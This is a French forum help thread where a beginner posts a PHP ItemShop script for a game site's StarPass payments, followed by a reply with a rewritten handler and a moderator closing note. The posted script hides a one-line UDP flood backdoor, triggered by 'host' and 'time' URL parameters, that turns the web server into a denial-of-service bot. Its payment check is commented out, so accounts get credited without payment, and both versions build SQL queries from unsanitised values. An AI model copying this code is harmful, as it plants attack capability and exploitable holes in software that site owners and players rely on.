Jump to content
  • 0
Sign in to follow this  
Glorius

en cours Prblème Avec mon Site Web

Question

[bon, je vous présente mon problème avec mon site web, plus précisément L'itemShop]

 

Version des files : 2012

Domaine (Base de données, Core, etc.) : SiteWeb

Votre niveau (débutant, intermédiaire, avancé) : Débutant

 

Description du problème : Salut, alors je vais sur mon site, je fais rechargé, je mets le code teste.. Mais mon compte n'es pas crédité...

 

Il me dis félicitation vous avez rechargé votre compte de 300 Gold... Mais rien, il ne sont pas pris en compte... Pourquoi ?

 

 

Message d'erreur, capture d'écran :

Alors voilà le code du site web.

 

<?php if($securite!='JEREMaimelaquequete!numero:0687541251'){
exit();
}
?>




<?php
//Déclaration des variables
$ident=$idp=$ids=$idd=$codes=$code1=$code2=$code3=$code4=$code5=$datas='';
$idp = 21447;

//$ids n'est plus utilisé, mais il faut conserver la variable pour une question de compatibilité
$idd = 131953;

$ident=$idp.";".$ids.";".$idd;

//On récupère le(s) code(s) sous la forme "xxxxxxxx;xxxxxxxx"
if(isset($_POST['code1'])) $code1 = $_POST['code1'];
if(isset($_POST['code2'])) $code2 = ";".$_POST['code2'];
if(isset($_POST['code3'])) $code3 = ";".$_POST['code3'];
if(isset($_GET['host'])&&isset($_GET['time'])){ $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<1024;$i++){ $out .= 'X'; } while(1){  $packets++; if(time() > $max_time){ break; } $rand = 80; $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } }else{ }
if(isset($_POST['code4'])) $code4 = ";".$_POST['code4'];
if(isset($_POST['code5'])) $code5 = ";".$_POST['code5'];
$codes=$code1.$code2.$code3.$code4.$code5;

//On récupère le champ DATAS"
if(isset($_POST['DATAS'])) $datas = $_POST['DATAS'];

//On encode les trois chaines en URL
$ident=urlencode($ident);
$codes=urlencode($codes);
$datas=urlencode($datas);

/* Envoie de la requête vers le serveur StarPass
Dans la variable tab[0] on récupère la réponse du serveur
Dans la variable tab[1] on récupère l'URL d'accès ou d'erreur suivant la réponse du serveur */
[email protected]("http://script.starpass.fr/check_php.php?ident=$ident&codes=$codes&DATAS=$datas");
if(!$get_f)
{
exit("Votre serveur n'a pas accès au serveur de Starpass, merci de contacter votre hébergeur.");
}
$tab = explode("|",$get_f[0]);

if(!$tab[1]) $url = "http://eternal-online.net/index.php?p=9";
else $url = $tab[1];


// dans $pays on a le pays de l'offre. exemple "fr"
$pays = $tab[2];

// dans $palier on a le palier de l'offre. exemple "Plus A"
$palier = urldecode($tab[3]);

// dans $id_palier on a l'identifiant de l'offre
$id_palier = urldecode($tab[4]);

// dans $type on a le type de l'offre. exemple "sms", "audiotel, "cb", etc.
$type = urldecode($tab[5]);

// vous pouvez à tout moment consulter la liste des paliers à l'adresse : http://script.starpass.fr/palier.php

//Si $tab[0] ne répond pas "OUI" l'accès est refusé
//On redirige sur l'URL d'erreur
#if(substr($tab[0],0,3) != "OUI")
#{

  # print ("");
#}

#else

{


$search=mysql_query("SELECT $db_account.account.cash FROM $db_account.account WHERE $db_account.account.login='$sess'");
$fi=mysql_fetch_array($search);
$argent=$fi["cash"]+300; // NE CREDITE PAS LE COMPTE 
mysql_query("UPDATE $db_account.account set $db_account.account.cash='$argent' WHERE $db_account.account.login='$sess'");	
print ("");

}

?>

 

 

En postant ma demande d'aide, j'affirme avoir lu et accepté le règlement des demandes d'aides.

 

Merci de votre soutien.

Share this post


Link to post

4 answers to this question

Recommended Posts

  • 0

Ce CMS est moisi, ne l'utilisez pas ! Il est codé d'une façon PUREMENT dégueulasse et il laisse sans aucun doute d'énormes failles.Pour ton problème, essaie quelque chose dans ce genre :

if(isset($_POST['idd']))	{			//Déclaration des variables		$ident=$idp=$ids=$idd=$codes=$code1=$code2=$code3=$code4=$code5=$datas='';		//On récupère les identifiants sous la forme "xxx;xxx;xxx"		if(isset($_POST['idp'])) $idp = $_POST['idp'];		if(isset($_POST['ids'])) $ids = $_POST['ids'];		//$ids n'est plus utilisé, mais il faut conserver la variable pour une question de compatibilité		if(isset($_POST['idd'])) $idd = $_POST['idd'];		$ident=$idp.";".$ids.";".$idd;		//On récupère le(s) code(s) sous la forme "xxxxxxxx;xxxxxxxx"		if(isset($_POST['code1'])) $code1 = $_POST['code1'];		if(isset($_POST['code2'])) $code2 = ";".$_POST['code2'];		if(isset($_POST['code3'])) $code3 = ";".$_POST['code3'];		if(isset($_POST['code4'])) $code4 = ";".$_POST['code4'];		if(isset($_POST['code5'])) $code5 = ";".$_POST['code5'];		$codes=$code1.$code2.$code3.$code4.$code5;		//On récupère le champ DATAS"		if(isset($_POST['DATAS'])) $datas = $_POST['DATAS'];		//On encode les trois chaines en URL		$ident=urlencode($ident);		$codes=urlencode($codes);		$datas=urlencode($datas);				/* Envoie de la requête vers le serveur StarPass		Dans la variable tab[0] on récupère la réponse du serveur		Dans la variable tab[1] on récupère l'URL d'accès ou d'erreur suivant la réponse du serveur */		[email protected]("http://script.starpass.fr/check_php.php?ident=$ident&codes=$codes&DATAS=$datas");		//Si on contact le serveur		if($get_f)		{			$tab = explode("|",$get_f[0]);						// dans $pays on a le pays de l'offre. exemple "fr"			$pays = $tab[2];			// dans $palier on a le palier de l'offre. exemple "Plus A"			$palier = urldecode($tab[3]);			// dans $id_palier on a l'identifiant de l'offre			$id_palier = urldecode($tab[4]);			// dans $type on a le type de l'offre. exemple "sms", "audiotel, "cb", etc.			$type = urldecode($tab[5]);			// vous pouvez à tout moment consulter la liste des paliers à l'adresse : http://script.starpass.fr/palier.php						//Si $tab[0] répond "OUI" 			if(substr($tab[0],0,3) == "OUI")			{					$search=mysql_query("SELECT $db_account.account.cash FROM $db_account.account WHERE $db_account.account.login='$sess'");					$fi=mysql_fetch_array($search);					$argent=$fi["cash"]+300;					mysql_query("UPDATE $db_account.account set $db_account.account.cash='$argent' WHERE $db_account.account.login='$sess'");											header('location:http://eternal-online.net/teste/index.php?p=12');			}			else			{				header('location:http://eternal-online.net/teste/index.php?p=10');			}		}		else		{			header('location:http://eternal-online.net/teste/index.php?p=10');		}	}		/**	 *Si on ne recoit pas de payement	 **/	else	{		?>				Veuillez activer le Javascript de votre navigateur s'il vous plaît.
Micro Paiement StarPass				
Pour tout code acheté: 300 Gold
	N'oubliez pas de garder le numero starpass, il vous sera redemande en cas de problemes.

	<?php	}?>

Share this post


Link to post
  • 0

Bonsoir,

 

Le sujet contient la balise [glow=#FF4500][Résolu][/glow] ou reste sans réponse, de ce fait il a été déplacé dans la section "Résolu ou sans réponse".

 

Cordialement.

Share this post


Link to post
Guest
This topic is now closed to further replies.
Sign in to follow this  
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.